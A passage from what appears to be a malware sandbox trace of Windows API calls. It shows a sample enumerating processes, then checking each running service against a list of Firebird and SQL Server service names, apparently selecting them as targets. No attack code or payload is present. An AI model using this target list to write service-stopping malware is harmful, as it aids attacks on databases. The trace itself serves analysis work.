lstrlenW (lpString="conhost.exe") returned 11 [0070.886] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.887] lstrlenW (lpString="conhost.exe") returned 11 [0070.887] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0070.888] lstrlenW (lpString="hgaibc.exe") returned 10 [0070.888] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0070.889] lstrlenW (lpString="cmd.exe") returned 7 [0070.889] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0070.890] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0070.890] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.891] lstrlenW (lpString="conhost.exe") returned 11 [0070.891] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0070.891] lstrlenW (lpString="conhost.exe") returned 11 [0070.891] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.892] lstrlenW (lpString="svchost.exe") returned 11 [0070.892] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.893] lstrlenW (lpString="svchost.exe") returned 11 [0070.893] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0070.894] lstrlenW (lpString="LogonUI.exe") returned 11 [0070.894] Process32NextW (in: hSnapshot=0x37c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0070.894] CloseHandle (hObject=0x37c) returned 1 [0070.894] Sleep (dwMilliseconds=0x1f4) [0071.459] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ede0 [0071.459] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0071.460] GetLastError () returned 0xea [0071.460] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x3cd2e68 [0071.460] EnumServicesStatusExW (in: hSCManager=0x60ede0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3cd2e68, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3cd2e68, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0071.461] CloseServiceHandle (hSCObject=0x60ede0) returned 1 [0071.461] lstrlenW (lpString="Appinfo") returned 7 [0071.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0071.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0071.461] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0071.461] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0071.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0071.461] lstrlenW (lpString="AppXSvc") returned 7 [0071.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0071.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0071.461] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0071.461] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0071.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0071.461] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0071.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0071.461] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0071.461] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0071.461] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0071.461] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0071.461] lstrlenW (lpString="Audiosrv") returned 8 [0071.461] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0071.462] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0071.462] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0071.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0071.462] lstrlenW (lpString="BFE") returned 3 [0071.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0071.462] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0071.462] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0071.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0071.462] lstrlenW (lpString="BITS") returned 4 [0071.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0071.462] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0071.462] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0071.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0071.462] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0071.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0071.462] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0071.462] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0071.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0071.462] lstrlenW (lpString="CDPSvc") returned 6 [0071.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0071.462] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0071.462] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0071.462] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0071.462] lstrlenW (lpString="ClickToRunSvc") returned 13 [0071.462] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0071.462] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0071.463] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0071.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0071.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0071.463] lstrlenW (lpString="CryptSvc") returned 8 [0071.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0071.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0071.463] lstrlenW (lpString="DcomLaunch") returned 10 [0071.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0071.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0071.463] lstrlenW (lpString="DeviceAssociationService") returned 24 [0071.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0071.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0071.463] lstrlenW (lpString="Dhcp") returned 4 [0071.463] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0071.463] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0071.463] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0071.463] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0071.463] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0071.463] lstrlenW (lpString="Dnscache") returned 8 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0071.464] lstrlenW (lpString="DoSvc") returned 5 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0071.464] lstrlenW (lpString="DPS") returned 3 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0071.464] lstrlenW (lpString="DusmSvc") returned 7 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0071.464] lstrlenW (lpString="EventLog") returned 8 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0071.464] lstrlenW (lpString="EventSystem") returned 11 [0071.464] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0071.464] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0071.464] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0071.464] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0071.464] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0071.465] lstrlenW (lpString="FontCache") returned 9 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0071.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0071.465] lstrlenW (lpString="gpsvc") returned 5 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0071.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0071.465] lstrlenW (lpString="iphlpsvc") returned 8 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0071.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0071.465] lstrlenW (lpString="KeyIso") returned 6 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0071.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0071.465] lstrlenW (lpString="LanmanServer") returned 12 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0071.465] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0071.465] lstrlenW (lpString="LanmanWorkstation") returned 17 [0071.465] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0071.465] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0071.465] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0071.465] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0071.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0071.466] lstrlenW (lpString="lfsvc") returned 5 [0071.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0071.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0071.466] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0071.466] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0071.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0071.466] lstrlenW (lpString="lmhosts") returned 7 [0071.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0071.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0071.466] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0071.466] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0071.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0071.466] lstrlenW (lpString="LSM") returned 3 [0071.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0071.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0071.466] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0071.466] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0071.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0071.466] lstrlenW (lpString="MapsBroker") returned 10 [0071.466] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0071.466] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0071.466] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0071.466] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0071.466] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0071.467] lstrlenW (lpString="MpsSvc") returned 6 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0071.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0071.467] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0071.467] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0071.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0071.467] lstrlenW (lpString="NcbService") returned 10 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0071.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0071.467] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0071.467] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0071.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0071.467] lstrlenW (lpString="netprofm") returned 8 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0071.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0071.467] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0071.467] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0071.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0071.467] lstrlenW (lpString="NlaSvc") returned 6 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0071.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0071.467] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0071.467] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0071.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0071.467] lstrlenW (lpString="nsi") returned 3 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0071.467] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0071.467] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0071.467] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0071.467] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0071.467] lstrlenW (lpString="PcaSvc") returned 6 [0071.467] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0071.468] lstrlenW (lpString="PlugPlay") returned 8 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0071.468] lstrlenW (lpString="Power") returned 5 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0071.468] lstrlenW (lpString="ProfSvc") returned 7 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0071.468] lstrlenW (lpString="RpcEptMapper") returned 12 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0071.468] lstrlenW (lpString="RpcSs") returned 5 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0071.468] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0071.468] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0071.468] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0071.468] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0071.468] lstrlenW (lpString="SamSs") returned 5 [0071.468] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0071.469] lstrlenW (lpString="Schedule") returned 8 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0071.469] lstrlenW (lpString="SecurityHealthService") returned 21 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0071.469] lstrlenW (lpString="SENS") returned 4 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0071.469] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0071.469] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0071.469] lstrlenW (lpString="ShellHWDetection") returned 16 [0071.469] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0071.469] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0071.469] lstrcmpiW (lpString1="sqlwriter", 